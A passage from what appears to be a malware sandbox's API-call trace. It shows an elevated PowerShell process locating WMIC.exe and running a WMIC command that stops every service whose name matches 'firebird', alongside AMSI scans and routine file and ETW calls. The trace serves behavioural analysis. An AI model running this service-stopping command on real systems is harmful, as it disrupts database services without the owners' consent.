fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0289.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0289.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0289.743] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0289.743] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0289.743] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1c620 [0289.744] FindNextFileW (in: hFindFile=0x7e1c620, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0289.744] FindClose (in: hFindFile=0x7e1c620 | out: hFindFile=0x7e1c620) returned 1 [0289.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0289.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0289.744] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0289.744] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x77, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0289.744] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x76, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0289.745] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x77, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x77, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0289.745] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0289.746] GetConsoleWindow () returned 0x302b8 [0289.752] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0289.752] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0289.753] CoTaskMemAlloc (cb=0x804) returned 0x7e29450 [0289.753] GetConsoleTitleW (in: lpConsoleTitle=0x7e29450, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0289.754] CoTaskMemFree (pv=0x7e29450) [0289.755] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%firebird%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4c430c0 | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%firebird%%'\" call stopservice", lpProcessInformation=0x4c430c0*(hProcess=0x824, hThread=0x820, dwProcessId=0x123c, dwThreadId=0x11d4)) returned 1 [0289.793] CloseHandle (hObject=0x820) returned 1 [0289.794] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0289.794] GetCurrentProcess () returned 0xffffffff [0289.795] GetCurrentProcess () returned 0xffffffff [0289.795] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x824, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0x820) returned 1 [0289.795] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0x820, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0292.114] CloseHandle (hObject=0x820) returned 1 [0292.115] GetExitCodeProcess (in: hProcess=0x824, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0292.117] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0292.122] CloseHandle (hObject=0x824) returned 1 [0292.123] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x77, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0292.125] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x77, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0292.126] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x75, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x75, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0292.126] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x75, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0292.126] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x76, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x76, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0292.130] SetEvent (hEvent=0x9b4) returned 1 [0292.130] SetEvent (hEvent=0xa10) returned 1 [0292.130] SetEvent (hEvent=0x9ac) returned 1 [0292.130] SetEvent (hEvent=0x9b8) returned 1 [0292.130] SetEvent (hEvent=0x814) returned 1 [0292.130] SetEvent (hEvent=0x9bc) returned 1 [0292.131] SetEvent (hEvent=0x9c0) returned 1 [0292.131] SetEvent (hEvent=0x60c) returned 1 [0292.131] SetEvent (hEvent=0x81c) returned 1 [0292.131] SetEvent (hEvent=0x818) returned 1 [0292.132] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0292.138] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0292.141] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0x9df72bbb, Data2=0x4136, Data3=0x4dad, Data4=([0]=0xbe, [1]=0x41, [2]=0x8e, [3]=0xb1, [4]=0x5d, [5]=0x13, [6]=0x6c, [7]=0x1a))) returned 0x0 [0292.141] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=38717620265) returned 1 [0292.142] AmsiOpenSession () returned 0x0 [0292.142] AmsiScanString () returned 0x80070015 [0292.155] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=38719010050) returned 1 [0292.156] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0292.156] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0292.157] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x76, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0292.157] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0292.157] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0292.157] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0292.157] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0292.160] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="ሰғ徠玤") returned 0x0 [0292.160] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0292.160] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0292.161] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0292.161] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0292.162] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0292.162] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0292.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0292.162] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0292.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0292.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0292.163] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0292.163] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0292.163] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0292.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0292.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0292.164] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0292.164] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0292.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0292.164] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0292.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0292.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0292.164] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0292.164] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0292.165] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0292.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0292.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0292.165] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0292.165] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0292.165] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0292.165] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0292.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0292.166] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0292.166] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0292.166] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0292.166] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0292.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0292.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0292.166] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0292.166] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0292.167] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0292.167] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0292.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0292.167] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0292.167] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0292.167] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0292.167] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1c620 [0292.168] FindNextFileW (in: hFindFile=0x7e1c620, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0292.168] FindClose (in: hFindFile=0x7e1c620 | out: hFindFile=0x7e1c620) returned 1 [0292.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0292.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0292.168] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0292.169] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0292.169] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x7e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0292.169] EtwEventActivityIdControl (in: ControlCode=0x2, 